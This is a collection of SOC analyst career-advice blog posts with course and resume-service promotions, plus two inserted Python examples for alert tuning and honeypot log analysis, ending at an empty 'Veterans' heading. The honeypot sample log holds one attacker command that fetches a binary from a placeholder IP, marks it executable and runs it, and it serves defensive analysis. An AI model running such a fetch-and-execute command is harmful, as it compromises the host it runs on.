- What is a Major Frustration of Being a SOC Analyst
What is a Major Frustration of Being a SOC Analyst

This job isn't without its great moments, but those moments come with a price tag: the frustrating things you encounter as a SOC analyst. This is What is a Major Frustration of Being a SOC Analyst? Here is the big one on my list from having worked at so many SOCs: the larger the company, the more they can pay but the less they can move. It is frustrating to spend a lot of time on a security event, make recommendations for improvements, and not see any results. Small companies can incorporate feedback the same day, and you get all the feel-goods that you did something positive, that rewarding feedback that you just made the program better. At a large company you might investigate that same alarm a hundred times before they are able to make any improvements, if they can incorporate any feedback at all. Some companies seem too big to move at all. This leads to alert fatigue, where you're auto-closing incidents that look alike and becoming a brainless drone in pursuit of good numbers.

Closing a feedback loop at a large company takes skill, patience, persistence, and the ability to manage without authority. A feedback loop in a process is when the end result feeds back to the beginning to improve the process. For example, a SOC analyst concludes in their investigation that an event is a false positive, so they take the time to collect the evidence from all the previous false positives, write an analysis, and submit it to the team that creates the detection rules so that they can tune the rule and improve the efficiency of the SOC. In the long run this saves the company a ton of money, but in the short term it hurts your numbers: how many events you've worked that day. Terrible, inexperienced management only sees the numbers and not the impact.
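The feedback loop described above in practice, as an added example that is not part of the original article: it takes a month of closed alerts, computes the false-positive share and the analyst time burned per rule, and drafts the tuning request for the detection team. The alert records, the field names (rule, disposition, entity, reason, minutes) and the two thresholds are constructed assumptions, not any case tool's schema.

```python
"""Build the evidence for a detection-tuning request from closed alerts.

Added example, not code from the original article or from any SIEM/SOAR
vendor. The alert records are constructed to look like closed SOC tickets;
the field names (rule, disposition, entity, reason, minutes) and the two
thresholds are assumptions, not any product's schema.
"""
from collections import Counter, defaultdict

FP_RATE_THRESHOLD = 0.8  # assumption: >= 80% false positives is worth a tuning request
MIN_ALERT_COUNT = 5      # assumption: fewer alerts than this is not enough history


def _alert(rule, disposition, entity, reason, minutes):
    """One closed alert; 'minutes' is the analyst time spent before closing it."""
    return {"rule": rule, "disposition": disposition, "entity": entity,
            "reason": reason, "minutes": minutes}


# Constructed sample: what an analyst might export from the case tool for one month.
SAMPLE_ALERTS = (
    [_alert("PsExec Lateral Movement", "false_positive", "svc-sccm",
            "SCCM deployment account", 20) for _ in range(7)]
    + [_alert("PsExec Lateral Movement", "true_positive", "jdoe-laptop",
              "unexpected admin share access", 90)]
    + [_alert("Office Spawning PowerShell", "false_positive", "hr-macro-tool",
              "signed payroll macro", 15) for _ in range(4)]
    + [_alert("Office Spawning PowerShell", "false_positive", "fin-macro",
              "signed finance macro", 15) for _ in range(2)]
    + [_alert("Impossible Travel", "false_positive", "vpn-pool",
              "corporate VPN egress", 10) for _ in range(3)]
    + [_alert("Impossible Travel", "true_positive", "contractor-01",
              "login from unknown ASN", 60)]
    + [_alert("Mimikatz Command Line", "true_positive", "ws-0451",
              "credential dumping", 120) for _ in range(2)]
)


def summarize_rules(alerts):
    """Per rule: volume, false-positive share, analyst minutes burned on FPs,
    and the single entity behind most of the FPs (the exclusion candidate)."""
    per_rule = defaultdict(list)
    for alert in alerts:
        per_rule[alert["rule"]].append(alert)
    summary = {}
    for rule, rows in per_rule.items():
        fps = [r for r in rows if r["disposition"] == "false_positive"]
        top = Counter(r["entity"] for r in fps).most_common(1)
        top_entity, top_count = top[0] if top else (None, 0)
        summary[rule] = {
            "total": len(rows),
            "false_positive": len(fps),
            "true_positive": sum(r["disposition"] == "true_positive" for r in rows),
            "fp_rate": len(fps) / len(rows),
            "fp_minutes": sum(r["minutes"] for r in fps),
            "top_fp_entity": top_entity,
            "top_fp_entity_count": top_count,
        }
    return summary


def tuning_candidates(summary, min_alerts=MIN_ALERT_COUNT, fp_threshold=FP_RATE_THRESHOLD):
    """Rules with enough history and a high enough FP share, worst first."""
    picked = [(rule, s) for rule, s in summary.items()
              if s["total"] >= min_alerts and s["fp_rate"] >= fp_threshold]
    return sorted(picked, key=lambda item: (-item[1]["fp_rate"], -item[1]["fp_minutes"]))


def tuning_request(rule, stats):
    """Render the request to detection engineering: the numbers, the proposed
    exclusion, and the true positives the rule must keep catching afterwards."""
    return "\n".join([
        f"Tuning request: {rule}",
        f"  {stats['false_positive']} of {stats['total']} alerts ({stats['fp_rate']:.0%}) "
        f"closed as false positive, costing {stats['fp_minutes']} analyst-minutes.",
        f"  {stats['top_fp_entity_count']} of those came from '{stats['top_fp_entity']}'.",
        f"  Proposal: exclude '{stats['top_fp_entity']}' from this rule rather than disabling it;",
        f"  the rule still produced {stats['true_positive']} true positive(s) that must keep firing.",
    ])


if __name__ == "__main__":
    report = summarize_rules(SAMPLE_ALERTS)
    for rule, stats in tuning_candidates(report):
        print(tuning_request(rule, stats), end="\n\n")
```

Note what the request carries besides the raw count: the single entity behind most of the noise, so the proposal is an exclusion and not switching the rule off, and the true positives the rule still produced, which is what detection engineering needs to see before accepting the change.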
At small companies you tend to know your colleagues better, and there is less red tape preventing this kind of feedback from improving your work (and your mental health), so things get done quickly. They are nimble and agile. I've worked at companies so large that I was convinced they weren't improving the program on purpose, because when I took so much time to gather the evidence and present it in a matter-of-fact and easy-to-understand way, it was just ignored. What I noticed about my peers is that they had all tried doing this too, and they stopped because there wasn't any improvement. It was a waste of time. This results in an incredibly inefficient and dangerous SOC where the team members have zero morale and zero care about their work. They are just brainless Sisyphuses clocking in and clocking out and getting nowhere with their work or their careers. What's on your list?

Tyler Wall is the founder of Cyber NOW Education. He holds a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn. You can sign up for a Lifetime Membership of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF", which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs eBook from the Secure Style Store. These labs walk you through several hands-on labs in Microsoft Azure, leaving you with the know-how to create a gig on Fiverr or Upwork to start your cybersecurity freelancing.
Some of our free resources include the Forums, the Knowledge Base, our True Entry Level SOC Analyst Jobs, Job Hunting Application Tracker, Resume Template, and Weekly Networking Checklist. Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book, Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success, 2nd edition, published June 1st, 2024, winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in paperback, Kindle, or PDF. The downloadable PDF version can be grabbed here.
- What is the Ideal SOC Analyst
Looking for the Ideal SOC Analyst

I need success stories. But who can I find to help get a job? It'd need to be someone with the right education that doesn't yet have the zing that I can give it. Someone with a bachelor's degree and a Sec+ would do. If they have help desk experience, that's a bonus. Any experience in IT certainly makes finding a job as a SOC analyst easier. They'd need to live near a large city, but not one with a high cost of living. Salaries are too high there, and employers are moving away from them because of the cost of living. They say it's the taxes, and that's partially true, but really it's because they can't pay triple their labor costs and they can't come out and say "we want to pay people less." Dallas, Texas is good. Atlanta, Georgia. There's a long list of places companies are migrating to, or growing where they already have a location: somewhere with opportunity that isn't too expensive. Is that where you live? A master's degree is too much. It's counterintuitive, but employers might think you'll find something better too quickly once you get experience. If you have one, that's fine, but a bachelor's degree is better for the short term. Ideally it'd be a computer science degree. Cybersecurity degrees teach high-level policy that isn't applicable for years and years, and you have to be really technical for entry-level roles. Gender, race, and sexual identity don't matter. There are as many employers looking for balance on their teams as there are looking for a culture fit, I would think. Must be a US citizen. That's important. Must have a blog and show that the community means something to you. The hiring manager will look at your blog if you link it on your resume. Blog your journey to becoming a SOC analyst: any how-tos and walkthroughs of things you've learned. Write reviews of resources you've consumed (books, courses, etc.), giving honest feedback for your peers. Must attend local cybersecurity groups.
2600, DEF CON groups, OWASP, maker spaces, and hacker spaces. Must be building your network, making the coffee, and building your contacts. Share your resume and take other people's resumes to share with others. If you've presented something, put it on your resume. These are great places to pick a topic you know something about and present on it for a resume addition. Must be in online Discords. Show personality and uniqueness. Be supportive of your peers and contribute to those who need help. Don't be a d*ck. Must be modest on LinkedIn. You should have one, but it shouldn't be too personal; keep it professional. It shouldn't be an embarrassment, but you should contribute occasionally and show support for your colleagues. You want to show teamwork and that you can get along with your peers. Don't go for "look at me" unless you've really just accomplished something, and do that sparingly, like for a degree or certification. Must have a home lab, preferably in the cloud, with projects they can read about on your blog. Chances are this doesn't sound like you, and this person is super difficult to find. While you can't change things like where you live so easily, you can improve your odds of becoming the passionate security nerd they're looking for. The hiring process is always going to require a fair amount of sheer luck. Suppose you just wake up feeling like a million bucks that day and ace the interviews. You'd have a better chance. Not every day is a perfect day, and bad interviews happen. But on paper, before the interviews, these are some of the things you can think about doing that will increase your odds of becoming the ideal SOC analyst candidate.
- Am I Going To Be Automated Out Of A SOC Analyst Job
We've been hearing it for years, and I've said it too: "There will always be a need for SOC analysts because there are some things that machines cannot do." This is Am I Going To Be Automated Out Of A SOC Analyst Job? But that's not the hard truth. The hard truth is there's a dashboard that lists, in dollars, how much SOAR tools have saved in labor hours. Some of them even count it in headcount. So this whole story about how you shouldn't be worried about your job is straight garbage. The truth is, if you're just now starting, automation has already automated analyst work just like yours. Instead of leaving the more complex work that machines cannot do to human analysts, they're accepting the risk and just moving on. Automation has gotten better over the years, and what used to take a team of seasoned developers to code can now be configured by pointing, clicking, dragging, and dropping. There used to be a knowledge gap between the developers and the SOC skills they were automating, so progress wasn't quick. The best solution they came up with was to put senior SOC analysts in the same room as the coders doing the automating. That worked OK, except the senior SOC analyst was in a predicament: they were helping automate their own job. Years ago the car factories went through a similar process when the assembly lines were robotized. They had this figured out: they hired outside consultants to come in and build the automation, to avoid the issue of workers having to automate their own jobs. And they successfully automated assembly lines. Did it displace workers? You bet it did. 1.7 million manufacturing jobs have been lost since 2000. It is expected that in just the next six years, 14% of all jobs in the US will be impacted by AI and automation. It's automation that you need to be concerned about as a SOC analyst. Most of our tasks are repeatable and, I hate to say this, but they are brainless to do once you learn how.
You can teach a robot to do most of the work and never have to think about it again. The SOC is going to be drastically displaced by machines, and it's already begun. Is cybersecurity the right career for someone just starting out and looking for a growing, in-demand field? Probably not. That ship has sailed. We're shrinking now. Does this mean you shouldn't follow your dreams? NOT AT ALL. I've said this time and time again since the golden age of cybersecurity, when there wasn't an unemployed soul on earth, and it hasn't changed today: DO NOT PURSUE this career if you don't like it. It's an extraordinary commitment that you can only sustain if you have an interest. This isn't like taking a job at, say, a paper mill where it's just a paycheck. You have to like it so much that you are proactive in learning, or you'll be out of a job anyway. So where does this leave you if you like cybersecurity and it's shrinking? Stick to the cloud. The cloud is the most in-demand area in cybersecurity, and in IT in general, and it's less impacted by automation because it's so new. Cloud engineering is extremely complex; it's going to take some time to automate those workflows, and you'll have enough time to work your way out of the SOC. Start now. Start with the cloud NOW! But only if you like it.
- How to Work from Home in the SOC
Working from home is new to the SOC. Prior to COVID, almost all employers required you to work from a dedicated room for the SOC. This was in a highly secure area, often with no windows. I quit a six-figure SOC job just because they had us crammed in a room like sardines. It was so hot, and there was so much drama about the thermostat, it was unbelievable. It was just a tiny, narrow, windowless room at the center of the building, designed in a working concept known as a bullpen: rows of monitors and chairs at a long desk with no dividers or personal space. I left that job and got my own happy little cubicle, where I spent the next few years. Then I landed my first remote role. This is How to Work from Home in the SOC? The first thing I had to learn about is routines. The SOC is mainly shift work, so you'll have set hours that you need to work: morning, day, or night shift. So I am going to stray from calling it a "morning routine". In my most recent roles I have been working with the SOC as an advisor, but I set my own hours, and it only becomes increasingly difficult to maintain the boundary between work and personal life. Before you work there needs to be a "getting started routine". This could be anything from listening to a podcast for an hour while you eat, putting your favorite pug slippers on, and then logging into work, to watching an episode of the Simpsons, filling your water bottle, and grabbing a snack before sitting down at your desk. It doesn't really matter what the routine is, but you need to do it every single day to train your brain that this is you going to work. You are commuting now. And the same thing for when you end work. When you end work you might go check your snail mail, take a walk, or cook dinner. Do it every day. This is you commuting home. What you are practicing is setting boundaries.
Microsoft Teams, Slack, and the other instant messaging clients used for work have settings for when you're off work. Use them. When you are not at work, there is no longer an expectation that you can be contacted immediately. If the building burnt down for whatever reason and they needed you, HR and your manager have your phone number. Do this even when you want to work all the time. These are your boundaries, and you need to stick to them. I mention this because I have been contacted by colleagues from other countries for whom it was normal business hours while I was tired and in bed, and against my better judgement I have answered those messages; aside from not answering them correctly, I wasn't in good spirits. I began to develop a resentment that I was having to "work all the time", but it was my own fault. My manager never had the expectation that I needed to be working then. You must create boundaries. For the first couple of years of remote working I siloed myself, lived in a desert alone, and as a result I just wasn't able to get as much done. I had to learn things like how to build rapport with my teammates, and that it needs to be intentional. With remote working you don't get that "water cooler" talk or accidentally bumping into each other in the halls anymore. It's easy not to place importance on taking a little time to chat with your coworkers from time to time. It's easy to get isolated and not feel part of the team. When you need help with something, it's awkward to ask strangers, so you waste more of your time and the company's time trying to figure it out yourself, and strangers don't know you well enough to know your strengths and ask you for help, so you're not building any leadership or mentoring skills that will help your career in the long run. The biggest thing I have learned to avoid in remote working is isolation. Appearance does matter, and I'll be the unpopular one to tell you that.
And it has a lot to do with lighting, which is an easy fix. In my honest experience, with rare exceptions, nobody cares if you are fat or skinny, where you come from, what color you are, or how you define yourself. I wouldn't recommend making it your headliner or putting it on your resume either. What they care about is that you look like you take care of yourself. If you don't take care of yourself, the first impression is that they won't trust you to take care of your work. Bad lighting can make a model look homeless. That is my big tip for improving appearances, other than keeping your hair cut. So, you're welcome. Most people come on camera in T-shirts, and most women on your team will only wear makeup for the first few meetings; then it's like having a sister. I don't know if you've ever had a sister, but they don't wear makeup when they're hanging around the house. I use a small device called a Lume Cube that I only recently found out about. I mention this because I have terrible lighting in my office, and I've learned the hard way that it plays a role in your work life. Also, on video it looks better not to have to use the automatic background remover in Zoom or Teams, so try facing your desk against a wall if you can, but that's not nearly as big a deal as lighting. The Lume Cube can suction onto your laptop, and you can use it everywhere you go. But note, I haven't found the suction cup to be all that great, so it might be worth getting the stand for it too. Since I only use it at home, I rubbed a purple glue stick over the suction cup, stuck it on the back of my monitor, and it hasn't moved since. It's a simple solution, and I'm happy with it. Lighting can get complicated, and I just needed something that didn't make me look like a troll. Other than for work, I use it to record the trainings for my Udemy classes. Note: for your interview, wear a button-down shirt and nice pants, a belt, and shoes if you're a guy.
You want to feel as confident as you can for interviews. Looking your best, even if they can't tell, makes you feel good, and it shows. I'm not qualified to give advice for ladies, sorry.
- How to Set SOC Analyst Goals
If you can take one big hairy audacious goal (BHAG) and break it down into its many smaller goals, the result is what's called the snowball effect. Once you complete the first small goal, you get a mental boost to complete the next. And then the next. Before you know it, you've accomplished something, and it doesn't feel all that big anymore. Often you'll look back and think the hardest part of the BHAG was getting started. It really, truly is about micro goals. This is How to Set SOC Analyst Goals? I would also tell you that a successful career is about choosing your tasks, and the time you spend on them, with tact. What I mean is that everyone seems to be always overworked, and those who excel are those who can prioritize and deliver on the tasks that give the most bang for the buck. There isn't enough time in two lifetimes to complete everything I've been asked to do in my career. At times I've been asked to do things that no one cares about, and that's the last I ever hear about it. It would take me days to do and would interfere with more important things. Then I get asked to do something easy that ultimately lands on the CEO's desk. Which of those two do you do? It's a no-brainer: you smash the task and over-deliver on the vision of the executives. The Eisenhower Matrix is a task management tool that helps you organize and prioritize tasks by urgency and importance. Using the tool, you divide your tasks into four boxes: the tasks you'll do first, the tasks you'll schedule for later, the tasks you'll delegate, and the tasks you'll delete. In this piece, we'll explain how to set up an Eisenhower Matrix and provide tips for task prioritization. Making a to-do list is the first step toward getting work done. But how do you determine what to tackle first when you don't have enough time to do everything in one day?
With effective prioritization, you can increase your productivity and ensure that your most urgent tasks get immediate attention. The Eisenhower Matrix is a task management tool that helps you distinguish between urgent and important tasks so you can establish an efficient workflow. Dwight D. Eisenhower — the 34th President of the United States and a five-star general during World War II — presented the idea that would later lead to the Eisenhower Matrix. In a 1954 speech, Eisenhower quoted an unnamed university president when he said, "I have two kinds of problems, the urgent and the important. The urgent are not important, and the important are never urgent." Stephen Covey, author of The 7 Habits of Highly Effective People, took Eisenhower's words and used them to develop the now-popular task management tool known as the Eisenhower Matrix. The Eisenhower Matrix is also known as the time management matrix, the Eisenhower Box, and the urgent-important matrix. This tool helps you divide your tasks into four categories: the tasks you'll do first, the tasks you'll schedule for later, the tasks you'll delegate, and the tasks you'll delete.

Urgent tasks require your immediate attention. When something is urgent, it must be done now, and there are clear consequences if you don't complete it within a certain timeline. These are tasks you can't avoid, and the longer you delay them, the more stress you'll likely experience, which can lead to burnout. Like the executive high-visibility request above: over-deliver on that. Important tasks may not require immediate attention, but they help you achieve your long-term goals. Just because these tasks are less urgent doesn't mean they don't matter. You'll need to plan thoughtfully for these tasks so you can use your resources efficiently.

Quadrant 1: Do

Quadrant one is the "do" quadrant, and this is where you'll place any tasks that are both urgent and important.
When you see a task on your to-do list that must be done now, has clear consequences, and affects your long-term goals, place it in this quadrant. There should be no question about which tasks fall here, because these are the tasks at the front of your mind and likely stressing you out the most. These are the phishing emails to executives.

Quadrant 2: Schedule

Quadrant two is the "schedule" quadrant, and this is where you'll place any tasks that are not urgent but are still important. Because these tasks affect your long-term goals but don't need to be done right away, you can schedule them for later. You'll tackle these tasks right after you tackle the tasks in quadrant one. You can use various time management tips to help you accomplish the tasks in this quadrant; some helpful strategies include the Pareto principle and the Pomodoro method. These are your development goals.

Quadrant 3: Delegate

Quadrant three is the "delegate" quadrant, and this is where you'll place any tasks that are urgent but not important. These tasks must be completed now, but they don't affect your long-term goals. Because you don't have a personal attachment to these tasks and they likely don't require your specific skill set, you can delegate them to other members of your team. Delegating tasks is one of the most efficient ways to manage your workload and give your team the opportunity to expand their skill set. As a junior SOC analyst, there's no one below you. If you have an MSSP, it would be a good time to see if the tasks can be delegated to them. But you do have teammates, and you should act like a team. If you pick up a ticket and someone else is already halfway through working a similar ticket, don't be shy: ask them if they'd like to work this one too. It makes their metrics look better and keeps the SOC efficient.
This is queue management.

Quadrant 4: Delete

Once you've gone through your to-do list and added tasks to the first three quadrants, you'll notice that a handful of tasks are left over. The tasks left over are the ones that weren't urgent or important. These unimportant, non-urgent distractions are simply getting in the way of you accomplishing your goals. Place these remaining items in the fourth quadrant, which is the "delete" quadrant. But remember, if something you deleted keeps popping back up on your radar, it's time to reevaluate the importance of that task. These are the special projects that you don't have any time for. Zig Ziglar said, "You can have everything you want in life, if you will just help other people get what they want." I will always encourage people to ask me for things, because I believe in the motto "If you never ask, the answer is always no", and I'm not afraid to say no. So prioritize correctly, get more done, and push the envelope sometimes in your career if you deserve it.
- SOC Analyst Roadmap to Success
This article will discuss background-specific tips for landing your first SOC Analyst role. The four audiences are college graduates, IT career changers, veterans, and the autodidact. Each one has its nuances, making it worthwhile to dedicate this article to your roadmap to success.

Roadmap to Success

This series has given you insight into what a SOC Analyst does on a day-to-day basis and general strategies for finding your first job in cybersecurity as a SOC Analyst. It was written to target four key audiences: the recent college graduate, those career-changing from other areas of IT, the transitioning military, and the self-taught. This article gives background-specific tips on things you need to know that apply directly to you. I will repeat myself through these four sections, driving home the idea that you have to prove your interest and back it up with examples, in addition to hard technical skills. Veterans have extensive networks of people and partnerships just waiting for them to plug into; the college graduate has their school's career services to leverage; people transitioning from other areas of IT already have real-life experience, often in domains that overlap with cybersecurity; and lastly, the autodidact's strongest selling point is their projects and involvement with the community at large. I recommend that students of all backgrounds who are worried they don't have much to talk about in an interview deploy a few honeypots. Then take the data from them and analyze it. In the article The SOC Analyst Method, I explain how to analyze a security event. Practice this method on the honeypot attackers and find interesting things to discuss in the interview. One more plug. I will mention in this article how you should write your resume based on your particular background. Give it your best shot at writing your resume, but when you're just starting, it can be difficult to highlight what you know.
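What the honeypot analysis suggested above can look like, as an added example that is not part of the original article or of any honeypot project: it parses constructed JSON-lines log entries in the shape SSH honeypots such as Cowrie write, tolerates broken lines, and reduces them to facts an interviewee can state and defend. The event and field names are assumptions to adjust for whatever honeypot you deploy; the source addresses are documentation ranges.

```python
"""Turn SSH honeypot logs into facts you can talk about in an interview.

Added example, not code from the original article or from any honeypot
project. The log lines are constructed; their shape follows the JSON lines
that SSH honeypots such as Cowrie write, but treat the event names and field
names as assumptions and adjust the constants for the honeypot you deploy.
"""
import json
import re
from collections import Counter, defaultdict

# Assumed event identifiers; change these if your honeypot names them differently.
EV_LOGIN_FAILED = "cowrie.login.failed"
EV_LOGIN_SUCCESS = "cowrie.login.success"
EV_COMMAND = "cowrie.command.input"
URL_RE = re.compile(r"https?://[^\s;'\"|&]+")

# Constructed sample (documentation IP ranges); the last line is deliberately broken.
SAMPLE_LOG = """
{"timestamp": "2024-05-01T02:14:07Z", "eventid": "cowrie.session.connect", "src_ip": "203.0.113.5", "session": "a1"}
{"timestamp": "2024-05-01T02:14:08Z", "eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "session": "a1", "username": "root", "password": "123456"}
{"timestamp": "2024-05-01T02:14:09Z", "eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "session": "a1", "username": "root", "password": "admin"}
{"timestamp": "2024-05-01T02:14:10Z", "eventid": "cowrie.login.success", "src_ip": "203.0.113.5", "session": "a1", "username": "root", "password": "password"}
{"timestamp": "2024-05-01T02:14:12Z", "eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "session": "a1", "input": "uname -a"}
{"timestamp": "2024-05-01T02:14:13Z", "eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "session": "a1", "input": "cat /proc/cpuinfo | grep name | wc -l"}
{"timestamp": "2024-05-01T02:14:15Z", "eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "session": "a1", "input": "wget http://198.51.100.7/bins/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"}
{"timestamp": "2024-05-01T03:02:41Z", "eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "b7", "username": "pi", "password": "raspberry"}
{"timestamp": "2024-05-01T03:02:42Z", "eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "b7", "username": "ubuntu", "password": "ubuntu"}
{"timestamp": "2024-05-01T03:40:00Z", "eventid": "cowrie.login.failed", "src_ip": "192.0.2.77", "session": "c3", "username": "root", "password": "123456"}
this line was truncated by a log rotation and is not JSON
"""


def parse_events(text):
    """Parse JSON-lines output, keeping only well-formed events that name a source IP."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue  # partial or rotated lines are common; skip them, do not abort
        if isinstance(obj, dict) and "eventid" in obj and "src_ip" in obj:
            events.append(obj)
    return events


def summarize(events):
    """Who hit the honeypot, what credentials they tried, who got in, what they ran."""
    by_source = Counter(e["src_ip"] for e in events)
    credentials = Counter((e.get("username"), e.get("password")) for e in events
                          if e["eventid"] in (EV_LOGIN_FAILED, EV_LOGIN_SUCCESS))
    successes = [(e["src_ip"], e.get("username"), e.get("password"))
                 for e in events if e["eventid"] == EV_LOGIN_SUCCESS]
    commands = defaultdict(list)
    for e in events:
        if e["eventid"] == EV_COMMAND:
            commands[e["session"]].append(e["input"])
    # Anything fetched after login is the payload: evidence to hash and look up, never to execute.
    urls = sorted({u for cmds in commands.values() for c in cmds for u in URL_RE.findall(c)})
    return {"by_source": by_source, "credentials": credentials, "successes": successes,
            "commands": dict(commands), "download_urls": urls}


def talking_points(summary, top_n=3):
    """Short, specific statements an analyst can back with the raw log."""
    points = [f"{ip} generated {n} events" for ip, n in summary["by_source"].most_common(top_n)]
    if summary["credentials"]:
        (user, pw), n = summary["credentials"].most_common(1)[0]
        points.append(f"most attempted credential: {user}/{pw} ({n} tries)")
    for ip, user, pw in summary["successes"]:
        points.append(f"{ip} logged in as {user}/{pw}; a real host must never accept that pair")
    for session, cmds in summary["commands"].items():
        points.append(f"session {session} ran {len(cmds)} commands, starting with '{cmds[0]}'")
    for url in summary["download_urls"]:
        points.append(f"payload staged from {url}: hash the file, never run it, check the host in threat intel")
    return points


if __name__ == "__main__":
    for point in talking_points(summarize(parse_events(SAMPLE_LOG))):
        print("-", point)
```

Run it against a day of your own honeypot's output and the points are your interview material: who connected, which credentials they sprayed, what they ran once a weak password let them in, and where the payload was staged. Treat any file the attacker downloaded as evidence to hash and look up, never as something to execute.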
I have worked out a deal with Resume Raiders on your behalf to offer a 20% discount on services; just use the coupon code SOCANALYSTNOW. I receive zero commissions or discounts; the code saves you about $60 on a complete resume rewrite. Dave also offers resume revision services at a lower price if only smaller changes are needed. He will share your resume as a Google Doc, and you will collaborate back and forth as he asks you questions. You answer them in comments, and then he pens your resume. I use him myself; that's the only reason I recommend him. So let's get started.

Recent Graduate

Congratulations! You have graduated or are about to graduate from college. It's a monumental achievement, and I hope you've learned a lot. Maybe you had an internship, and that's great, because what you're fighting now is a lack of experience. Getting experience with commercial tools is one of the most challenging things. They cost millions of dollars and run in highly complex enterprise environments. But the hiring manager knows that. What he's looking for is experience with any projects you may have had while in school, any personal projects you've had, and overall, checking to make sure you're not a commodity graduate with zero interest in cybersecurity other than the paycheck. So many people graduate, don't know anything, and have no real passion or interest in cybersecurity. That is the reputation you are fighting against as a recent college graduate. Your resume should reflect the projects you've worked on during school. Explore your school's career services to see if they have people who know how to write your resume in a way that highlights the experience you gained from your curriculum. This should be your first stop, as they see what you've learned while in your program. Then maybe poke Resume Raiders for a revision if you're not having any luck. You need a project to talk about.
The question of why you like cybersecurity is inevitable, and you should be fully prepared to give examples of the projects you've been a part of that you truly enjoyed. Eventually, what you want to do in cybersecurity will come up. One thing you have on your side from a formal education is exposure to a variety of things, and you probably already know what you like and don't like. So talk about the classes and projects you truly enjoyed and say you'd like to work in the SOC for a few years to get even more breadth of experience before deciding on a specialty. When you're finally in the SOC, you'll see how we do things in the real world. It's often much different from the Ivory Tower you learned about in college. Sometimes it's messy with lots of red tape, and your dream isn't what it pans out to be. That is what happened to me as a penetration tester. I loved hacking around and had been doing it for years, and I thought all through college that this was precisely what I wanted to do; I was so sure of myself. I started in the SOC, worked hard, became a pentester, and then learned I hated it. It was the worst! Luckily, I was already qualified to be a SOC Analyst, so I regrouped and found my way into Security Engineering with nothing lost. I haven't strayed too far from the SOC ever since. Your degree alone is not going to get you a job. It's an essential step in any career, but significantly less critical today than it was a while ago. Most big companies have removed the requirement to have a college degree, but some still require it. Those that require it should be your first applications: fewer applicants have college degrees, so there may be less competition.

From IT

So you want to join the exciting world of cybersecurity. As you might already know, moving into a SOC Analyst role might mean a temporary pay cut, depending on your seniority in IT. You're looking at around $80-$100k starting.
But you might be considering it because you've hit the glass ceiling in IT, done your research, and know the glass ceiling is higher in cybersecurity. You might just be more interested in a domain within cybersecurity and need the SOC Analyst role to get there. Whatever the reason, you're reading this piece, and being a SOC Analyst is on your mind. There are a few things you need to know. It's a lot like IT. The same problems you're having in IT, you're going to have in cybersecurity. On-call is typical; it changes rapidly, and there is a glass ceiling you'll inevitably hit. After a while, you realize it's a glorified customer service position. You might already have certifications that apply to cybersecurity, like any networking or Microsoft certifications, which are a plus; any CompTIA certifications are good, too. In general, you're familiar with the certification game. You may be past the certification game in your IT career, but be prepared to start it all over as a SOC Analyst. It almost sounds like I'm discouraging you from becoming a SOC Analyst, but I'm not. I know how important it is for us to do work we like. The only reason I'm writing a book is that I enjoy writing. It's so challenging to be stuck doing work you don't like, and to make it worse, you probably won't be good at it. I would only suggest this path to someone from IT if they like cybersecurity. The reason doesn't matter; just be prepared to discuss it in an interview. I recommend going to the ISC2 website, finding the domains of cybersecurity, and writing your resume around the skills and experience you gained at your previous employers in those domains. There will be a lot of overlap. Anyone with a significant amount of experience in IT is qualified for a SOC Analyst job, and since you picked up this book, you already know why you're interested. Of all the backgrounds this book applies to, yours is the one that will find work in cybersecurity most easily. Experience trumps everything.
Autodidacts

Calling all hackers. You only really end up in this category if you've been hacking around at things for years and are sitting around thinking how great it would be to do this for a living. Well, good news: it happens constantly, but there are some things to consider. How do you quantify experience with something you're not supposed to be doing? First off, congratulations on staying out of jail, and I say that assuming you've kept your nose clean. If you haven't, there aren't many people who will hire you. It does happen, and some companies will employ extremely talented felons, but it's rare, and what usually happens is they create their own companies and other companies hire them as contractors. That's so rare, I won't cover it in detail. Here's what you do if you've been hacking away on your own. You play Capture the Flag competitions and set up labs. When asked what experience you have, tell them you set up labs and give the spiel about your lab environment before they can ask. You get a bug bounty and put it on your resume. You contribute to a community project or improve on a standard tool. You write your own blog and publish articles about your research. It's significantly more difficult for you to get a call back from a job posting and compete with all the other applicants on your resume alone. The tips for attending conferences, hackerspaces, makerspaces, and meetups are critical. You need to be at every single one and start contributing. Pick a topic and give presentations, or just make the coffee. Get on LinkedIn and add SOC Analysts, join a group, and contribute. You need a resume, but you also need to know someone on the inside to pick your resume from the pile and give you an interview. Of all the backgrounds this book covers, this is the most difficult one from which to land a job in cybersecurity, because you need twice the skills of a college graduate, and excellent luck. However, you'll likely succeed in the long run, because you can't teach passion.
You'll have to do a lot of work for free before you build the reputation to get paid for it.

Veterans

